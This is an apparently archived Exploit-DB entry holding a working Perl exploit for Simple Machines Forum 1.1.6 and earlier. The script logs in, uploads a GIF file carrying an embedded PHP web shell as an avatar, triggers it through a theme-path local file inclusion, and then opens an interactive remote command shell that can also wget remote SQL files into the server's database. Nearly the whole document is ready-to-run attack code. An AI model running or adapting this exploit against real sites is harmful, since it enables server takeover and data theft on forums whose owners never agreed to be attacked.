Simple Machines Forum (SMF) 1.1.6 - Local File Inclusion / Code Execution

EDB-ID:

7011




Platform:

PHP

Date:

2008-11-05


#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that killed rgod. 
#         We can't thank you enough for killing a bug killer. 
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/ magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#   
# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd@win32]$ ver
# 
# Microsoft Windows XP [Version 5.1.2600]
# 
# [cmd@win32]$
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
my %parms = (	s => "",
        		d => 0,
        		x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
        		u => "Gl0ria!!!",
        		p => "gl0ria\@herb3st" );

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s"; 

if( !$parms{s} ) {
		die <<HELP
[ii] usage: $0 <parms>
	[-s]    Site        -> http://site.com/forums
	[-x]	Proxy       -> localhost:8118
	[-u]	Username    -> Gl0ria!!!
	[-p]    Password    -> gl0ria\@herb3st
	[-d]    Debug
HELP
}

my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
			chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
			chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00). 
			chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
			chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00); $shell .= <<'EXIF';
<?php 
 error_reporting(0);ini_set('max_execution_time',0);
 $x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' : '0');
 if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
 print '---1243---';if($z){print eval($x);}else{print passthru($x);}print '---3421---';exit; 
?>
EXIF
			$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
			chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
			chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
			chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
			chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
			chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
			chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
			chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
			chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
			chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
			chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
			chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
			chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
			chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
			chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
			chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
			chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
			chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
			chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
			chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
			chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
			chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
			chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
			chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
			chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
			chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
			chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
			chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
			chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
			chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
			chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
			chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
			chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
			chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
			chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
			chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
			chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
			chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
			chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
			chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
			chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
			chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
			chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
			chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
			chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
			chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
			chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
			chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
			chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
			chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
			chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
			chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
			chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
			chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
		[
			user			=> $parms{u},
			passwrd			=> $parms{p},
			cookielength	=> -1
		]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

die "[!!] Wrong username/password\n"
	unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;

die "[!!] Error getting session id\n"
	unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;

die "[!!] Error getting id\n"
	unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");

&shell
	if $ret->as_string =~ /expl0ited/;

$ret = $ua->request( 
		POST "$parms{s}/index.php?action=profile2",
		Content_Type	=> 'multipart/form-data',
		Content			=>
		[
			avatar_choice	=> "upload",
			sc				=> $sid,
			userID			=> $id,
			sa				=> "forumProfile",
			attachment		=>
			[
				undef,
				"expl0ited.gif",
				Content         => $shell,
				"Content-Type"	=> "image/gif"
			]
		]);

## Updating Settings.php
$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");

print "[ii] Uploaded a shell...\n"
    if $parms{d};

shell();

## lulz @ this shit.
sub shell {
	my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;

	die "[!!] magic_quotes is turned on\n"
		if (not defined $os or not defined $sh or $1 eq $id);
		
    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";
    
    do {
		print "[$sh\@$os]\$ ";
		$cmd = chomp (my $cmd = <STDIN>);
		

		exit
			unless $cmd !~ /^exit$/i;

        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else { undef $file; }
        
        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
        }

        $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";

        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
	} while( $cmd !~ /^exit$/i );

	exit;
}

# milw0rm.com [2008-11-05]